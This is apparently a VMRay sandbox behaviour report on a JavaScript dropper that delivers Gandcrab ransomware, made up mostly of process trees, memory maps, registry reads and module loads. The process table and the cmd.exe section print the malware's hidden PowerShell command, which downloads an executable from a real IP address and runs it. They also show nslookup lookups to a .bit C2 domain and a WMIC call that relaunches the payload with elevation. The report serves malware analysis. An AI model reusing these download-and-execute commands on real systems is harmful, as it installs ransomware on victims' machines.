Javascript Dropper #1 - Gandcrab Analysis | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: Windows 10 (64-bit) | windows_script_files
Classification: Dropper, Downloader, Ransomware

b4b6f6c2588001e5b95eed79faf99a92b9d9224f65af6a92e055ddfb145a1ecc (SHA256)

DOC6131166051-PDF.js

JScript

Created at 2018-03-14 01:58:00

...

Notifications (2/3)

Some extracted files may be missing in the report since the total file extraction size limit was reached during the analysis. You can increase the limit in the configuration settings.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis because the sample installed a startup script or application for persistence.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xd7c Analysis Target Medium cscript.exe "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS" -
#3 0xe6c Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','%appdAta%qTP35.exe'); staRt-ProceSS '%appdAta%qTP35.exe' #1
#5 0xe98 Child Process Medium powershell.exe powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'); staRt-ProceSS 'C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe' #3
#6 0xfd8 Child Process Medium roamingqtp35.exe "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" #5
#7 0xb74 Child Process Medium nslookup.exe nslookup politiaromana.bit ns1.virmach.ru #6
#9 0xd40 Autostart Medium roamingqtp35.exe "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" -
#11 0xdc4 Child Process Medium nslookup.exe nslookup politiaromana.bit ns1.virmach.ru #9
#13 0xee4 Child Process Medium nslookup.exe nslookup politiaromana.bit ns1.virmach.ru #9
#15 0x588 Child Process High (Elevated) wmic.exe "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" #9
#17 0x330 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #15
#18 0xc50 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #17
#19 0x6fc Child Process High (Elevated) cmd.exe cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe #18
#21 0xcf0 Child Process High (Elevated) roamingqtp35.exe C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe #19
#22 0xd48 Child Process High (Elevated) nslookup.exe nslookup politiaromana.bit ns1.virmach.ru #21

Behavior Information - Grouped by Category

Process #1: cscript.exe
83 0
»
Information Value
ID #1
File Name c:\windows\system32\cscript.exe
Command Line "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:13, Reason: Analysis Target
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:03:10
OS Process Information
»
Information Value
PID 0xd7c
Parent PID 0x4f8 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x D80
0x DC8
0x DEC
0x E00
0x E04
0x E28
0x E2C
0x E30
0x E50
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x00000025ab6e0000 0x25ab6e0000 0x25ab7dffff Private Memory Readable, Writable True False False -
private_0x00000025ab800000 0x25ab800000 0x25ab9fffff Private Memory Readable, Writable True False False -
private_0x00000025aba00000 0x25aba00000 0x25abafffff Private Memory Readable, Writable True False False -
private_0x00000025abb00000 0x25abb00000 0x25abbfffff Private Memory Readable, Writable True False False -
private_0x00000025abc00000 0x25abc00000 0x25abcfffff Private Memory Readable, Writable True False False -
private_0x00000025abd00000 0x25abd00000 0x25abdfffff Private Memory Readable, Writable True False False -
private_0x00000025abe00000 0x25abe00000 0x25abefffff Private Memory Readable, Writable True False False -
private_0x00000025abf00000 0x25abf00000 0x25abffffff Private Memory Readable, Writable True False False -
private_0x00000025ac000000 0x25ac000000 0x25ac0fffff Private Memory Readable, Writable True False False -
private_0x00000025ac100000 0x25ac100000 0x25ac1fffff Private Memory Readable, Writable True False False -
private_0x000002116f330000 0x2116f330000 0x2116f34ffff Private Memory Readable, Writable True False False -
pagefile_0x000002116f330000 0x2116f330000 0x2116f33ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002116f340000 0x2116f340000 0x2116f346fff Private Memory Readable, Writable True False False -
pagefile_0x000002116f350000 0x2116f350000 0x2116f364fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f370000 0x2116f370000 0x2116f373fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f380000 0x2116f380000 0x2116f380fff Pagefile Backed Memory Readable True False False -
private_0x000002116f390000 0x2116f390000 0x2116f391fff Private Memory Readable, Writable True False False -
locale.nls 0x2116f3a0000 0x2116f45dfff Memory Mapped File Readable False False False -
private_0x000002116f460000 0x2116f460000 0x2116f466fff Private Memory Readable, Writable True False False -
pagefile_0x000002116f470000 0x2116f470000 0x2116f471fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f480000 0x2116f480000 0x2116f480fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002116f490000 0x2116f490000 0x2116f490fff Private Memory Readable, Writable True False False -
private_0x000002116f4a0000 0x2116f4a0000 0x2116f4a0fff Private Memory Readable, Writable True False False -
cscript.exe 0x2116f4b0000 0x2116f4b8fff Memory Mapped File Readable True False False -
pagefile_0x000002116f4c0000 0x2116f4c0000 0x2116f4c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f4c0000 0x2116f4c0000 0x2116f4c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f4d0000 0x2116f4d0000 0x2116f4d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f4e0000 0x2116f4e0000 0x2116f4e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f4f0000 0x2116f4f0000 0x2116f4f0fff Pagefile Backed Memory Readable True False False -
private_0x000002116f4f0000 0x2116f4f0000 0x2116f4fffff Private Memory Readable, Writable True False False -
pagefile_0x000002116f500000 0x2116f500000 0x2116f500fff Pagefile Backed Memory Readable True False False -
jscript.dll.mui 0x2116f500000 0x2116f503fff Memory Mapped File Readable False False False -
shell32.dll 0x2116f510000 0x2116f51ffff Memory Mapped File Readable False False False -
private_0x000002116f520000 0x2116f520000 0x2116f61ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x2116f620000 0x2116f6fcfff Memory Mapped File Readable False False False -
pagefile_0x000002116f620000 0x2116f620000 0x2116f6dbfff Pagefile Backed Memory Readable True False False -
stdole2.tlb 0x2116f6e0000 0x2116f6e4fff Memory Mapped File Readable False False False -
pagefile_0x000002116f6f0000 0x2116f6f0000 0x2116f6f0fff Pagefile Backed Memory Readable, Writable True False False -
cversions.2.db 0x2116f700000 0x2116f703fff Memory Mapped File Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db 0x2116f710000 0x2116f754fff Memory Mapped File Readable True False False -
cversions.2.db 0x2116f760000 0x2116f763fff Memory Mapped File Readable True False False -
private_0x000002116f770000 0x2116f770000 0x2116f77ffff Private Memory Readable, Writable True False False -
pagefile_0x000002116f780000 0x2116f780000 0x2116f907fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116f910000 0x2116f910000 0x2116fa90fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002116faa0000 0x2116faa0000 0x21170e9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000021170ea0000 0x21170ea0000 0x2117129afff Pagefile Backed Memory Readable True False False -
private_0x00000211712a0000 0x211712a0000 0x2117147ffff Private Memory Readable, Writable True False False -
private_0x00000211712a0000 0x211712a0000 0x2117139ffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x211713a0000 0x2117142dfff Memory Mapped File Readable True False False -
pagefile_0x0000021171430000 0x21171430000 0x21171430fff Pagefile Backed Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db 0x21171440000 0x2117145cfff Memory Mapped File Readable True False False -
pagefile_0x0000021171460000 0x21171460000 0x21171460fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000021171470000 0x21171470000 0x2117147ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x21171480000 0x211717b6fff Memory Mapped File Readable False False False -
pagefile_0x00000211717c0000 0x211717c0000 0x211727bffff Pagefile Backed Memory Readable, Writable True False False -
rpcss.dll 0x211717c0000 0x2117189cfff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff070000 0x7df5ff070000 0x7ff5ff06ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6c8f20000 0x7ff6c8f20000 0x7ff6c901ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6c9020000 0x7ff6c9020000 0x7ff6c9042fff Pagefile Backed Memory Readable True False False -
cscript.exe 0x7ff6ca030000 0x7ff6ca05efff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffbfc920000 0x7ffbfc9e7fff Memory Mapped File Readable, Writable, Executable True False False -
scrobj.dll 0x7ffbfdde0000 0x7ffbfde23fff Memory Mapped File Readable, Writable, Executable True False False -
wldp.dll 0x7ffc049f0000 0x7ffc049fbfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffc079e0000 0x7ffc07b97fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x7ffc0c050000 0x7ffc0c06afff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffc0d740000 0x7ffc0dac1fff Memory Mapped File Readable, Writable, Executable False False False -
pcacli.dll 0x7ffc0faa0000 0x7ffc0faaffff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x7ffc0fab0000 0x7ffc0facdfff Memory Mapped File Readable, Writable, Executable True False False -
msisip.dll 0x7ffc0fad0000 0x7ffc0fadbfff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ffc0fae0000 0x7ffc0faeffff Memory Mapped File Readable, Writable, Executable False False False -
actxprxy.dll 0x7ffc110f0000 0x7ffc11582fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffc119f0000 0x7ffc11a11fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x7ffc11ef0000 0x7ffc12075fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffc123a0000 0x7ffc12435fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x7ffc138b0000 0x7ffc13948fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc13a90000 0x7ffc13a9ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc13bf0000 0x7ffc13c44fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc142c0000 0x7ffc14486fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc16550000 0x7ffc165f6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc16810000 0x7ffc16969fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc17330000 0x7ffc1739efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create ShEll.aPplIcAtiON IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (6)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS type = size True 1
Fn
Get Info - type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Read - size = 3717, size_out = 3717 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 110 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.JS - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 144, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 144, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 144, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.JS data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create Cmd.exe show_window = 161790939264 True 1
Fn
Module (24)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x7ffc17120000 True 2
Fn
Load amsi.dll base_address = 0x7ffc0fae0000 True 1
Fn
Load WLDP.DLL base_address = 0x7ffc049f0000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7ffc16250000 True 1
Fn
Get Handle c:\windows\system32\cscript.exe base_address = 0x7ff6ca030000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 1
Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ffc14550000 True 1
Fn
Get Filename c:\windows\system32\cscript.exe process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7ffc17147430 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiInitialize, address_out = 0x7ffc0fae2260 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiScanString, address_out = 0x7ffc0fae26b0 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 True 1
Fn
Get Address c:\windows\system32\wldp.dll function = WldpGetLockdownPolicy, address_out = 0x7ffc049f1010 True 1
Fn
Get Address c:\windows\system32\wldp.dll function = WldpIsClassInApprovedList, address_out = 0x7ffc049f37b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7ffc1625ac70 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7ffc16262db0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7ffc16266290 True 1
Fn
Create Mapping C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS filename = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, protection = PAGE_READONLY, maximum_size = 3717 True 1
Fn
Map C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 2273907775344 True 1
Fn
System (12)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = Ticks, time = 97921 True 2
Fn
Get Info type = Operating System True 4
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #3: cmd.exe
58 0
»
Information Value
ID #3
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','%appdAta%qTP35.exe'); staRt-ProceSS '%appdAta%qTP35.exe'
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:23, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:03:00
OS Process Information
»
Information Value
PID 0xe6c
Parent PID 0xd7c (c:\windows\system32\cscript.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x E70
0x E94
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000009c45200000 0x9c45200000 0x9c453fffff Private Memory Readable, Writable True False False -
private_0x0000009c45400000 0x9c45400000 0x9c454fffff Private Memory Readable, Writable True False False -
private_0x0000009c45500000 0x9c45500000 0x9c455fffff Private Memory Readable, Writable True False False -
private_0x00000244f38a0000 0x244f38a0000 0x244f38bffff Private Memory Readable, Writable True False False -
pagefile_0x00000244f38a0000 0x244f38a0000 0x244f38affff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000244f38b0000 0x244f38b0000 0x244f38b6fff Private Memory Readable, Writable True False False -
pagefile_0x00000244f38c0000 0x244f38c0000 0x244f38d4fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000244f38e0000 0x244f38e0000 0x244f38e3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000244f38f0000 0x244f38f0000 0x244f38f0fff Pagefile Backed Memory Readable True False False -
private_0x00000244f3900000 0x244f3900000 0x244f3901fff Private Memory Readable, Writable True False False -
private_0x00000244f3910000 0x244f3910000 0x244f3916fff Private Memory Readable, Writable True False False -
private_0x00000244f3990000 0x244f3990000 0x244f3a8ffff Private Memory Readable, Writable True False False -
locale.nls 0x244f3a90000 0x244f3b4dfff Memory Mapped File Readable False False False -
private_0x00000244f3d30000 0x244f3d30000 0x244f3d3ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x244f3d40000 0x244f4076fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff180000 0x7df5ff180000 0x7ff5ff17ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6b1930000 0x7ff6b1930000 0x7ff6b1a2ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6b1a30000 0x7ff6b1a30000 0x7ff6b1a52fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff6b2520000 0x7ff6b2579fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 2
Fn
Get Info powershell.exe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xe98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff6b2520000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 2
Fn
